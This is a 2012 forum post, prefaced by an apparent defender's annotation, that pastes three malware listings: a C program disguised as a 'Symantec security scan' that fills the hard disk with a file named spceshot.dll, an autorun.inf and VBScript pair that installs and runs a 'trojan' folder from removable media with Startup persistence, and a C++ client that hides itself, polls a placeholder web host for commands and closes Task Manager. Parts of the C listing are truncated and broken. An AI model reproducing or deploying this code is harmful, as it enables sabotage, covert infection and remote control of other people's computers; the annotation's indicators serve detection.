// NOTE(review): Defender-oriented annotation of the forum post below. The post
// pastes three separate listings back to back with their line breaks lost; the
// posted text itself is left exactly as it was.
//
// Listing 1 (C, uses conio.h/dos.h): a disk-filling program that presents
// itself as "SSYMANTEC SECURITY SCAN - 2009".
//   - accept() prints a disclaimer and, per its getch() != 13 check, exits
//     unless ENTER is pressed.
//   - findroot() probes C:, D:, E: and F: for \windows\explorer.exe. On a match
//     it quits if \windows\system32\spceshot.dll already exists; otherwise it
//     opens that file with "wb+" and calls showstatus() and eatspace().
//   - eatspace() loops on fputs() of the banner string `ch` until the call
//     returns EOF, then prints a made-up result count taken from random(120).
//   - draw() and showstatus() only paint the fake scanner text.
//   As posted the listing is truncated in places (the fputs() call has no
//   stream argument and the long cputs() string in accept() is never closed),
//   so it does not compile as shown.
//   Indicator from the page: a file named spceshot.dll under
//   %windir%\System32; the program's own text says deleting that file undoes
//   the effect.
//
// Listing 2 (autorun.inf + VBScript go.vbs): removable-media launcher.
//   - autorun.inf: [AutoRun] open=wscript go.vbs.
//   - go.vbs: if C:\Windows\trojan exists, moves it to
//     C:\Windows\trojanbackup<day-of-year>, the day being taken from
//     winrat.exe's DateLastModified; copies .\trojan to c:\Windows\trojan;
//     runs C:\Windows\trojan\winrat.exe; copies Trojan.lnk into the All Users
//     Startup folder when it is not already there.
//   Indicators from the page: C:\Windows\trojan\, winrat.exe, Trojan.lnk in
//   "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\", and
//   wscript started with go.vbs from the inserted drive.
//   Mitigation: with AutoRun disabled for every drive type (the
//   NoDriveTypeAutoRun policy) the open= entry is not acted on; monitoring
//   writes to the all-users Startup folder covers the persistence step.
//
// Listing 3 (C++/Win32, lines numbered 001-160 by the forum): polling client.
//   - main(): calls FreeConsole(), starts the LowProfile thread, downloads
//     assign.html to c:\Windows\trojan\assign.txt if that file cannot be
//     opened, and reads an integer ID (Assign) from it. Then, in an endless
//     loop ending in Sleep(5000), it deletes and re-downloads option.txt and
//     target.txt over plain http:// from the placeholder host
//     www.yourwebsitehere.com, reads one integer from each, and starts
//     OptionN (N = 1..5) on a new thread when Target equals Assign or is 0.
//   - LowProfile(): in an endless loop ending in Sleep(500), looks up windows
//     by exact title (Task Manager, "System Settings Change", Windows Media
//     Player, "(D:)".."(G:) Removable Disk", Autoplay, Windows Script Host)
//     and posts WM_CLOSE to each one found; the Task Manager window is
//     retitled first.
//   - Option1..Option5 are empty stubs that return 0; the listing carries no
//     command payload.
//   Detection ideas: a process that has detached its console and fetches the
//   same two URLs about every five seconds; files appearing under
//   C:\Windows\trojan\; Task Manager closing right after it opens. The window
//   matching is by English title string, so it is presumably locale- and
//   version-dependent (not verifiable from the page).
Zaraky Posted June 4, 2012 Report Posted June 4, 2012 (edited) #include<stdio.h>#include<conio.h>#include<dos.h>#include<stdlib.h>FILE *a,*t,*b;int r,status,vir_count;double i;char ch[]="CREATION OF A SPECIAL FILE FOR SPACE OCCUPYING HARDDISK",choice;void eatspace(void);void findroot(void);void showstatus(void);void draw(void);void accept(void);void main(){draw();accept();textcolor(WHITE);draw();gotoxy(12,8);cputs("ANALYSIS OF THE SYSTEM. PLEASE WAIT ...");sleep(3);gotoxy(12,8);delline();cputs("ANALYSIS OF THE SYSTEM. PLEASE WAIT ...");getch();gotoxy(12,8);delline();findroot();}void accept(){textcolor(LIGHTRED);gotoxy(1,8);cputs("This program is a Trojan horse SIMPLE DEMO. If you run this program it will \ n \ REAT your space FULL ON HARD DISK DRIVE ROOT. HOWEVER AND 'POSSIBLE\n\rEELIMINATE THE DANNOE.\n\n\rTo fix the damage that 'VE \ TO DELETE THE FILES \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rSE you want to run the program, press ENTER, otherwise press any key to exitif((choice=getch())!=13)exit(0);}void draw(){clrscr();textcolor(WHITE);gotoxy(12,2);cputs("********************************************************");gotoxy(12,6);cputs("********************************************************");gotoxy(12,3);cputs("*\n\b*\n\b*\n\b");gotoxy(67,3);cputs("*\n\b*\n\b*\n\b");gotoxy(14,4);cputs("SSYMANTEC SECURITY SCAN - 2009 (RAPID SCANNER SYSTEM)");}void findroot(){t=fopen("C:\\windows\\explorer.exe","rb");if(t!=NULL){fclose(t);textcolor(WHITE);a=fopen("C:\\windows\\system32\\spceshot.dll","rb");if(a!=NULL){textcolor(LIGHTRED);gotoxy(12,8);cputs("SYSTEM SCAN is stopped. TRY AGAIN LATER!");getch();exit(1);}b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");if(b!=NULL){showstatus();eatspace();}}t=fopen("D:\\windows\\explorer.exe","rb");if(t!=NULL){fclose(t);a=fopen("D:\\windows\\system32\\spceshot.dll","rb");if(a!=NULL){textcolor(LIGHTRED);gotoxy(12,8);cputs("SYSTEM SCAN is stopped. 
TRY AGAIN LATER!");getch();exit(1);}b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");if(b!=NULL){showstatus();eatspace();}}t=fopen("E:\\windows\\explorer.exe","rb");if(t!=NULL){fclose(t);a=fopen("E:\\windows\\system32\\spceshot.dll","rb");if(a!=NULL){textcolor(LIGHTRED);gotoxy(12,8);cputs("SYSTEM SCAN is stopped. TRY AGAIN LATER!");getch();exit(1);}b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");if(b!=NULL){showstatus();eatspace();}}t=fopen("F:\\windows\\explorer.exe","rb");if(t!=NULL){fclose(t);a=fopen("F:\\windows\\system32\\spceshot.dll","rb");if(a!=NULL){textcolor(LIGHTRED);gotoxy(12,8);cputs("SYSTEM SCAN is stopped. TRY AGAIN LATER!");getch();exit(1);}b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");if(b!=NULL){showstatus();eatspace();}}if(t==NULL){textcolor(LIGHTRED);gotoxy(12,8);cputs("SCAN SYSTEM FAILED! Press any key to exit the program.");getch();exit(1);}exit(1);}void eatspace(){textcolor(LIGHTRED);gotoxy(12,16);cputs("NOTICE: Do not abort the scanning process to completion!\n");textcolor(WHITE);gotoxy(12,18);while(1){for(r=1;r<4;r++){for(i=1;i<900000;i++){status=fputs(ch,;if(status==EOF){textcolor(WHITE);vir_count=random(120);draw();gotoxy(12,8);cprintf("Scanning complete!. Detected and eliminated MINACCE d su%d",vir_count);gotoxy(12,10);cprintf("Press any key to CLOSE...");getch();break;}}cputs(".");if(status==EOF) break;}if(status==EOF) break;}exit(0);}void showstatus(){gotoxy(12,8);cputs("Scan your system for threats");gotoxy(12,10);cputs("This can take up FEW MINUTES FOR A FEW HOURS");gotoxy(12,13);cputs("SCAN IN PROGRESS. 
WAIT...");}or-Open Notepad (autorun.inf)[AutoRun]open=wscript go.vbsgo.vbsDim FSO,FileDim Date,Hour,Day,Backuppath,DaystringSet FSO = CreateObject("Scripting.FileSystemObject")If Fso.FolderExists ("C:\Windows\trojan") ThenSet File= FSO.GetFile("C:\Windows\trojan\winrat.exe")Date=File.DateLastModifiedDay=DatePart("y",Date)Daystring=CStr(Day)Backuppath="C:\Windows\trojanbackup"+DaystringFso.MoveFolder "C:\Windows\trojan", BackuppathEnd IfFSO.CopyFolder ".\trojan", "c:\Windows\trojan", trueSet oShell = CreateObject("WScript.Shell")oShell.Run "C:\Windows\trojan\winrat.exe"If Fso.FolderExists ("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\") ThenIf Fso.FileExists ("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Trojan.lnk") ThenElseFSO.CopyFile "c:\Windows\trojan\Trojan.lnk","C:\Documents and Settings\All Users\Start Menu\Programs\Startup\", trueEnd IfEnd Ifwscript.quitor001 #include <windows.h>002 #pragma comment(lib, "Winmm.lib")003 #include <urlmon.h>004 #pragma comment(lib, "urlmon.lib")005 #include <iostream>006 #include <fstream>007 #include <WinInet.h>008 #pragma comment(lib, "WinInet.lib")009 #include <ShlObj.h>010 using namespace std;011 012 int Option, Assign, Target;013 DWORD WINAPI LowProfile(LPVOID);014 DWORD WINAPI Option1(LPVOID);015 DWORD WINAPI Option2(LPVOID);016 DWORD WINAPI Option3(LPVOID);017 DWORD WINAPI Option4(LPVOID);018 DWORD WINAPI Option5(LPVOID);019 // Add more lines of Option6, Option7, etc. to create more commands.020 HWND TaskMgr, SysError, WMP, Disk1, Disk2, Disk3, Disk4, Autoplay, VBS;021 022 int main() {023 // Hide Console Window024 FreeConsole();025 026 CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&LowProfile, 0, 0, NULL);027 028 // Checks if assign.txt exists. If it doesn't (only first run), download assign.txt. This gives the computer an ID number. 
You can change assign.txt in the PHP file BEFORE you plug in the U3 drive.029 FILE *istream;030 if ( (istream = fopen ( "C:\\Windows\\trojan\\assign.txt", "r" ) ) == NULL ) {031 URLDownloadToFile(NULL, L"http://www.yourwebsitehere.com/trojan/assign.html", L"c:\\Windows\\trojan\\assign.txt", NULL, NULL);032 } else {033 }034 035 // Store Assign.txt in a variable036 ifstream inAssign;037 inAssign.clear();038 inAssign.open("c:\\Windows\\trojan\\assign.txt");039 inAssign >> Assign;040 inAssign.close();041 inAssign.clear();042 043 // Start the main loop that is downloading the textfile each 5 seconds.044 while(1) {045 046 // Download Option & Target047 remove("c:\\Windows\\trojan\\option.txt");048 remove("c:\\Windows\\trojan\\target.txt");049 DeleteUrlCacheEntry(L"http://www.yourwebsitehere.com/trojan/");050 DeleteUrlCacheEntry(L"http://www.yourwebsitehere.com/trojan/target.html");051 Sleep(100);052 URLDownloadToFile(NULL, L"http://www.yourwebsitehere.com/trojan/", L"c:\\Windows\\trojan\\option.txt", NULL, NULL);053 URLDownloadToFile(NULL, L"http://www.yourwebsitehere.com/trojan/target.html", L"c:\\Windows\\trojan\\target.txt", NULL, NULL);054 055 // Read Option056 ifstream inFile;057 inFile.clear();058 inFile.open("c:\\Windows\\trojan\\option.txt");059 inFile >> Option;060 inFile.close();061 inFile.clear();062 063 // Read Target064 ifstream inTarget;065 inTarget.clear();066 inTarget.open("c:\\Windows\\trojan\\target.txt");067 inTarget >> Target;068 inTarget.close();069 inTarget.clear();070 071 // If Target is equal to assign (so you can target a single computer) or if Target is zero (target all computers with your trojan)072 if(Target == Assign || Target == 0) {073 if(Option == 1) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option1, 0, 0, NULL); }074 else if(Option == 2) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option2, 0, 0, NULL); }075 else if(Option == 3) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option3, 0, 0, NULL); }076 else if(Option == 4) 
{ CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option4, 0, 0, NULL); }077 else if(Option == 5) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option5, 0, 0, NULL); }078 // Add more of these lines for more commands079 }080 Sleep(5000);081 }082 }083 084 // Our LowProfile Thread. Hides all errors and things that may popup while inserting your U3 drive.085 DWORD WINAPI LowProfile(LPVOID) {086 while(1) {087 // Obvious088 TaskMgr = FindWindow(NULL,L"Windows Task Manager");089 // May popup because of new hardware installation (U3)090 SysError = FindWindow(NULL,L"System Settings Change");091 // Windows Media Player may popup. Rarely happens, but had this once at a school computer.092 WMP = FindWindow(NULL,L"Windows Media Player");093 // The Removable Disk part of the U3 Drive can open automatically.094 Disk1 = FindWindow(NULL,L"(D:) Removable Disk");095 Disk2 = FindWindow(NULL,L"(E:) Removable Disk");096 Disk3 = FindWindow(NULL,L"(F:) Removable Disk");097 Disk4 = FindWindow(NULL,L"(G:) Removable Disk");098 // Autoplay099 Autoplay = FindWindow(NULL,L"Autoplay");100 // Errors caused by our VBScript go.vbs101 VBS = FindWindow(NULL,L"Windows Script Host");102 if( TaskMgr != NULL) {103 SetWindowText( TaskMgr,L"DIE!!!! 
=O");104 Sleep(500);105 PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);106 }107 if( SysError != NULL) {108 PostMessage( SysError, WM_CLOSE, (LPARAM)0, (WPARAM)0);109 }110 if( WMP != NULL) {111 Sleep(1000);112 PostMessage( WMP, WM_CLOSE, (LPARAM)0, (WPARAM)0);113 }114 if( Disk1 != NULL) {115 PostMessage( Disk1, WM_CLOSE, (LPARAM)0, (WPARAM)0);116 }117 if( Disk2 != NULL) {118 PostMessage( Disk2, WM_CLOSE, (LPARAM)0, (WPARAM)0);119 }120 if( Disk3 != NULL) {121 PostMessage( Disk3, WM_CLOSE, (LPARAM)0, (WPARAM)0);122 }123 if( Disk4 != NULL) {124 PostMessage( Disk4, WM_CLOSE, (LPARAM)0, (WPARAM)0);125 }126 if( Autoplay != NULL) {127 PostMessage( Autoplay, WM_CLOSE, (LPARAM)0, (WPARAM)0);128 }129 if( VBS != NULL) {130 PostMessage( VBS, WM_CLOSE, (LPARAM)0, (WPARAM)0);131 }132 Sleep(500);133 }134 }135 136 //137 // Here we start with our commands. Option1, Option2, Option3, etc.138 // Don't forget to also define and create a process for these Options if you want to create more.139 // Have Fun =D140 //141 142 DWORD WINAPI Option1(LPVOID) { // 1143 return 0;144 }145 146 DWORD WINAPI Option2(LPVOID) { // 2147 return 0;148 }149 150 DWORD WINAPI Option3(LPVOID) { // 3151 return 0;152 }153 154 DWORD WINAPI Option4(LPVOID) { // 4155 return 0;156 }157 158 DWORD WINAPI Option5(LPVOID) { // 5159 return 0;160 } Edited June 4, 2012 by Zaraky Quote
staticwater Posted June 4, 2012 Report Posted June 4, 2012 Am pus Codul. Am vazut codul, ce ai pus tu acolo nu e trojan! Quote